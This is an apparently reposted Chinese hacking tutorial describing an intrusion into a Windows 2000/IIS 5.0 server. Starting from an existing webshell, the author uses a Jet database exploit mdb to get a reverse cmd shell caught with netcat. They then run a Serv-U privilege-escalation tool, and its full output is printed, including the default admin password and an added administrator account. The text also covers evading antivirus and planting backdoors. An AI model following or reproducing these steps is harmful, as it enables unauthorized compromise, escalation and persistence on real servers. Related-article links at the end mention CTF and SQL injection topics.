jet exploit配合WEBSHELL提升权限

简介: http://www.3800hk.com/news/w31/17410.html 目标站点是WINDOWS SERVER 2000系统,IIS 5.0 Wscript.shell  shell.application  Wscript.network组件全部删除的情况下测试的,要是什么都没删,什么安全也没做,那这次测试也没有什么意义了.     现在管理员安全意识提高了,搞站越来越难了,往往拿到一个WEBSHELL,就不知道干些什么,除了FSO其他组件都不可以调用,就像这样的。
+关注继续查看

http://www.3800hk.com/news/w31/17410.html

目标站点是WINDOWS SERVER 2000系统,IIS 5.0 Wscript.shell  shell.application  Wscript.network组件全部删除的情况下测试的,要是什么都没删,什么安全也没做,那这次测试也没有什么意义了.

    现在管理员安全意识提高了,搞站越来越难了,往往拿到一个WEBSHELL,就不知道干些什么,除了FSO其他组件都不可以调用,就像这样的。如图1

看到了吧,入侵中对我们最有帮助的那3个组件全部删了,就一个FSO可以用,除非那个管理员是白痴,只删了组件,而没有把磁盘权限配好,很少有这样的管理员,碰到这种情况,一般就是传个Serv-u php exploit上去试下看看SERV-U密码改没,不过也不是每台机器都支持PHP的,所以这招也不是很管用,前段时间我弄了个MYSQL WEBSHELL提升都看过吧?必须要得到ROOT密码才行.最近不是出了个jet数据库溢出吗?可反弹得到一个cmdshell哦.不过是普通权限的。但是对于一些只会照着网上资料抄的管理员就N有用啦,虽然他把组件全部都删了但是,C盘的权限弄不明白,SERV-U的密码也是默认的,那就有我们的可趁之机了。好,我们先拿到个CMDSHELL再说吧,至少还能有一点机会.这里先概述一下这这个Microsoft Jet (msjet40.dll) Reverse Shell Exploit:

受影响系统:

Microsoft JET DB

不受影响系统:

Microsoft JET DB OLE Provider

详细描述:

Microsoft Jet数据库是MS Office应用程序中广泛使用的轻型数据库。msjet40.dll是Microsoft Jet数据库引擎的主要组件,可以评估并执行数据请求。

msjet40.dll解析数据库文件时没有执行充分的数据验证,这样攻击者就可以修改数据库文件,导致在打开MS Jet数据库时执行攻击者的代码。
 此信息由HexView提供(EML:vuln@hexview.com)
    存在漏洞的系统:
    * Microsoft JET 4.00.8618.0 版
    免疫系统:
    * Microsoft JetDB OLE Provider

先用jet.exe生成一个反弹连接的mdb文件如图2

好了生成好咯,然后我们就通过WEBSHELL传上去,有时候传上去,但是却没有找到文件,被杀了,把改为ASP后缀. 数据库操作功能比较强的ASP木马就属站长助手了。就用它来连接我们的“恶意”MDB文件吧,好上传成功,如图3

OK现在我们就开始连接我们生成好的文件咯,为了防止被杀毒软件XX我改成ASP后缀了.连接之前我们先得监听好端口哦,哪个端口?就是前面设置的,如图4

现在开始连接我刚刚上传的那个文件.如图5

 

只要没出现什么灾难性的错误,就表示连接成功了,好,看看我们的NC有反映没有.如图6

成功得到一个CMDSHELL,不过权限是GUESTS组的.这个时候IIS进程已经死了,所有的ASP文件都不可执行了.所以你得提前把你的工具什么的传上去.我之前已经把serv-u溢出程序传上去咯,在c:/winnt/system32/inetsrv/data/目录下 这个目录默认是EVERYONE完全控制的我想大家都知道,我就不多说.因为都做了权限CMDSHELL下根本没法跳到WEB目录.好了,执行我们的SERV-U溢出程序,看看管理员把默认密码改没有,啊哈?溢出成功,如图7

C:/WINNT/system32/inetsrv/Data>ftp 43958 "net user chadmin 520520 /add"
ftp 43958 "net user chadmin 520520 /add"
Serv-u >溢出工具黑猫专版

<220 Serv-U FTP Server v4.0 for WinSock ready...
>USER LocalAdministrator
<331 User name okay, need password.
******************************************************
>PASS #l@$ak#.lk;0@P
<230 User logged in, proceed.
******************************************************
>SITE MAINTENANCE
******************************************************
[+] Domain xl:0 Deleted
<505 Domain not found
******************************************************
[+] Creating New Domain...
<200-DomainID=2
******************************************************
[+] Domain xl:2 Created
[+] Creating Evil User
<220 Domain settings saved
200-User=xl
200 User settings saved
******************************************************
[+] Now Exploiting...
>USER xl
<331 User name okay, need password.
******************************************************
>PASS 111111
<230 User logged in, proceed.
******************************************************
[+] Now Executing: net user chadmin 520520 /add
<220 Domain deleted
******************************************************
[+] Domain xl:2 Deleted

C:/WINNT/system32/inetsrv/Data>

C:/WINNT/system32/inetsrv/Data>net user
net user

//QHMEDIASRV 的用户帐户

----------------------------------------------------------------
ASPNET                   chadmin                  courses
IUSR_QHMEDIASRV          IWAM_QHMEDIASRV          partner
  SQLDebugger              TsInternetUser

命令成功完成。

C:/WINNT/system32/inetsrv/Data>

没办法,还是被搞下了,终究归于管理员安全意识还不够高.权限配得不够好.后面该怎么样搞我就不用多说了,终端没开就给他开个.装后门,补漏洞

 
目录
相关文章
|
1月前
|
SQL 存储 Java
4.2 SQL Server获取webshell及提权基础
4.2 SQL Server获取webshell及提权基础
|
10月前
|
数据采集 Linux 网络安全
2022-渗透测试-web目录爆破-常用的三个工具
2022-渗透测试-web目录爆破-常用的三个工具
2022-渗透测试-web目录爆破-常用的三个工具
|
安全
ctfshow-萌新-web11( 利用命令执行漏洞获取网站敏感文件)
ctf.show 萌新模块 web11关, 这一关考察的是命令执行漏洞的利用, 源码中过滤了一部分命令执行函数和文件查看的命令, 推荐使用 passthru()函数配合 more命令获取敏感文件中的flag
297 0
ctfshow-萌新-web11( 利用命令执行漏洞获取网站敏感文件)
|
安全 PHP
ctfshow-萌新-web10( 利用命令执行漏洞获取网站敏感信息)
ctf.show 萌新模块 web10关,这一关考察的是命令执行漏洞的利用,闯关者需要知道3个以上PHP命令执行函数的使用,推荐使用 passthru()
179 0
ctfshow-萌新-web10( 利用命令执行漏洞获取网站敏感信息)
|
安全 PHP
ctfshow-萌新-web9( 利用命令执行漏洞读取网站敏感文件)
ctf.show 萌新模块 web9关,这一关考察的是命令执行漏洞的利用方式,使用PHP的命令执行函数执行系统命令,读取网站根目录下的配置文件,获取flag
329 0
ctfshow-萌新-web9( 利用命令执行漏洞读取网站敏感文件)
|
安全 前端开发 关系型数据库
网站漏洞扫描 某CMS代码的越权与install.php重置漏洞
客户网站前端时间被攻击,网站被劫持到了赌博网站上去,通过朋友介绍找到我们SINESAFE做网站的安全防护,我们随即对客户网站进行了全面的渗透测试,包括了网站的漏洞检测与代码安全测试,针对于发现的漏洞进行了修复,包括网站安全部署等等方面,下面我们将这一次的安全应急处理过程分享给有需要的客户。
144 0
网站漏洞扫描 某CMS代码的越权与install.php重置漏洞
|
SQL 安全 数据可视化
齐博cms最新SQL注入网站漏洞 可远程执行代码提权
齐博cms整站系统,是目前建站系统用的较多的一款CMS系统,开源,免费,第三方扩展化,界面可视化的操作,使用简单,便于新手使用和第二次开发,受到许多站长们的喜欢。开发架构使用的是php语言以及mysql数据库,强大的网站并发能力。于近日,我们SINE安全公司发现齐博cms又爆出高危的sql注入漏洞,关于该网站漏洞的详情,我们来详细的分析漏洞的产生以及如何利用。
499 0
齐博cms最新SQL注入网站漏洞 可远程执行代码提权
|
Windows SQL
windows管理员利器之用Log Parser Studio分析IIS日志(附逐浪CMS官方命令集)
原文:windows管理员利器之用Log Parser Studio分析IIS日志(附逐浪CMS官方命令集) Log Parser Studio是一个强大的IIS图形分析工具,值得推荐。
2031 0
|
监控 测试技术
如何利用sdclt.exe绕过UAC?
本文讲的是如何利用sdclt.exe绕过UAC?,Matt Nelson‏ @enigma0x3在最近的文章中公开了一个绕过Win10 UAC的技巧,通过修改HKCU下的注册表键值实现对UAC的绕过
1958 0
如何使用SilentCleanup绕过UAC?
本文讲的是如何使用SilentCleanup绕过UAC?,最近我在James Forshaw‏的博客学到了一个Win10下绕过UAC的技巧,该方法通过脚本实现,并且目前微软还未对该绕过方法进行修复(预计在Win10 RS3修复)。
1698 0
推荐文章
更多